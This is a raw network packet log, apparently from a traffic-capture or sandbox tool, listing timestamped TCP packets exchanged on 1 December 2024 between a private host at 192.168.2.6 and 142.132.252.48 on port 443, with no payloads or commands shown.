                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.709090948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.713907003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.713924885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.713995934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.714003086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.714060068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.719616890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.719635010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.719742060 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.719750881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.719882011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.766084909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.882606983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.882633924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.882688046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.882699966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.882752895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.882754087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.888401985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.888418913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.888494968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.888503075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.888551950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.893414021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.893433094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.893521070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.893528938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.893572092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.899257898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.899290085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.899338007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.899344921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.899395943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.899395943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.904700041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.904719114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.904767990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.904773951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.904799938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.904841900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.909760952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.909780979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.909879923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.909900904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.909945965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.911969900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.915661097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.915678978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.915741920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.915749073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.915791988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.915791988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.921125889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.921142101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.921206951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.921224117 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:02.921294928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.083782911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.083806038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.083882093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.083894014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.083950043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.089219093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.089236021 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.089296103 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.089306116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.089371920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.094949007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.094966888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.095038891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.095048904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.095105886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.100557089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.100574017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.100629091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.100639105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.100675106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.100688934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.106235027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.106251955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.106328964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.106338024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.106389999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.111254930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.111273050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.111344099 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.111351967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.111388922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.116878033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.116894007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.116974115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.116981983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.117034912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.122623920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.122639894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.122698069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.122709036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.122730017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.122756004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.225616932 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.285204887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.285228968 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.285274029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.285284996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.285331011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.285331011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.290996075 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.291014910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.291055918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.291073084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.291114092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.291114092 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.296842098 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.296858072 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.296931982 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.296942949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.297003984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.302773952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.302793026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.302834988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.302844048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.302876949 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.302901030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.307292938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.307308912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.307354927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.307362080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.307390928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.307408094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.313004971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.313020945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.313071966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.313079119 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.313124895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.313124895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.318006039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.318022966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.318073034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.318080902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.318114996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.318162918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.323824883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.323839903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.323878050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.323910952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.323924065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.323967934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.436635971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.486936092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.486962080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.487086058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.487099886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.490565062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.492567062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.492585897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.492660999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.492671013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.494606972 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.497576952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.498070002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.498087883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.498141050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.498148918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.498167992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.498605967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.503074884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.503097057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.503161907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.503169060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.506618023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.508817911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.508835077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.508907080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.508913994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.508956909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.508958101 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.512490034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.514364004 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.514386892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.514477968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.514484882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.514621019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.519396067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.519413948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.519505024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.519512892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.522562981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.525105000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.525130033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.525233984 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.525243044 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.526576996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.536756992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.688425064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.688446999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.688601971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.688612938 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.688693047 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.693550110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.693567038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.693634033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.693639994 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.694711924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.699275017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.699291945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.699352980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.699361086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.699403048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.699403048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.704200983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.704220057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.704282045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.704288960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.706872940 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.709986925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.710004091 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.710088015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.710095882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.710712910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.715595961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.715615034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.715683937 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.715703011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.717438936 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.720586061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.720602036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.720648050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.720655918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.720676899 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.720727921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.724003077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.726380110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.726408958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.726471901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.726480961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.726491928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.726530075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.736057997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.889822960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.889858961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.889936924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.889961958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.890103102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.895045996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.895066977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.895128012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.895138025 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.895165920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.895191908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.900755882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.900774956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.900846958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.900865078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.900928020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.905736923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.905755043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.905837059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.905847073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.905936956 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.911448956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.911468029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.911545992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.911555052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.911604881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.917016029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.917033911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.917105913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.917114973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.917167902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.922722101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.922744989 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:38:03.922801971 CET49721443192.168.2.6142.132.252.48
